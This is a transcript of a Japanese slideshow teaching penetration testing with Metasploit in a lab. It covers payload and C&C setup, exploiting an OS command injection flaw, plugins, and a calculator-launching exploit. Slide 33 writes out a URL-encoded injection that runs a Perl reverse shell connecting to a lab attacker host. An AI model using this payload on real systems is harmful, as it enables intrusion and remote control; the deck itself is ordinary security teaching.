Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Metasploitでペネトレーションテスト

20,745 views

Published on

Published in: Internet

Metasploitでペネトレーションテスト

  1. 1. Metasploitでペネトレーションテスト @super_a1ice
  2. 2. 目次 Metasploit Framework基本 Webアプリケーションの脆弱性を突いてみる Metasploit プラグイン Exploitを作って電卓を起動してみる
  3. 3. Metasploit Frameworkとは? 脆弱性を発見し、それを実証するためのフレームワー ク ペネトレーションテストを効率化するためのツール システムに重大な被害を与える可能性があるため、使 用には注意が必要
  4. 4. Metasploit Framework基本
  5. 5. Msfconsoleコマンド
  6. 6. モジュールの指定
  7. 7. シェルコードを設定
  8. 8. オプションの確認
  9. 9. ファイル名を設定
  10. 10. IPアドレスを設定
  11. 11. ポート番号を設定
  12. 12. Exploitの作成
  13. 13. C&Cサーバの用意
  14. 14. オプションの確認
  15. 15. シェルコードの設定
  16. 16. オプションの確認
  17. 17. IPアドレスを設定
  18. 18. ポート番号を設定
  19. 19. C&Cサーバの作成
  20. 20. Let's exploit !
  21. 21. Readme.txt
  22. 22. 攻撃が成功すると
  23. 23. システム情報の取得
  24. 24. lsコマンド
  25. 25. Webアプリケーションの脆弱性を 突いてみる
  26. 26. 準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意
  27. 27. 準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意 後ろに任意のコマンドを挿入可能
  28. 28. ※実験の際の注意 必ず仮想環境を用いること 閉じたネットワーク内で実行する スナップショットを用いて被害前の状態へ戻せるように する
  29. 29. ペイロードを選択
  30. 30. IPアドレスの設定
  31. 31. バックドアの生成
  32. 32. C&Cサーバの用意
  33. 33. Let's exploit !! http://192.168.56.3/?ip=1.1.1.1;perl%20-MIO%20- e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socke t::INET%28PeerAddr,%22192.168.56.2:4444%22%29;STDI N-%3Efdopen%28$c,r%29;$~- %3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27
  34. 34. 攻撃が成功すると
  35. 35. Metasploit プラグイン
  36. 36. プラグインを使用して機能を追加する
  37. 37. 便利なプラグイン Openvas MetasploitからOpenVASを利用するためのプラグイン Nessus MetasploitからNessusを利用するためのプラグイン Xssf MetasploitでXSSを行うためのプラグイン http://xssf.googlecode.com/svn/trunk auto_exploit データベースに登録された脆弱性に対してexploitする https://github.com/darkoperator/Metasploit-Plugins Postauto 確立しているセッションにコマンドを送信する https://github.com/darkoperator/Metasploit-Plugins
  38. 38. Exploitを作って電卓を 起動してみる
  39. 39. まずはExploitの用意 Exploit-dbから探す http://www.exploit-db.com/ 自作する
  40. 40. 今回は自作プログラムを用意
  41. 41. 大きなテキストファイルを読み込まると
  42. 42. ROP自動化
  43. 43. シェルコード選択
  44. 44. 変数の確認
  45. 45. 実行したいコマンドの設定
  46. 46. pythonのコードを生成
  47. 47. シェルコードをコピペしてから Let's exploit !!!
  48. 48. 電卓が起動!!
  49. 49. ありがとうございました

×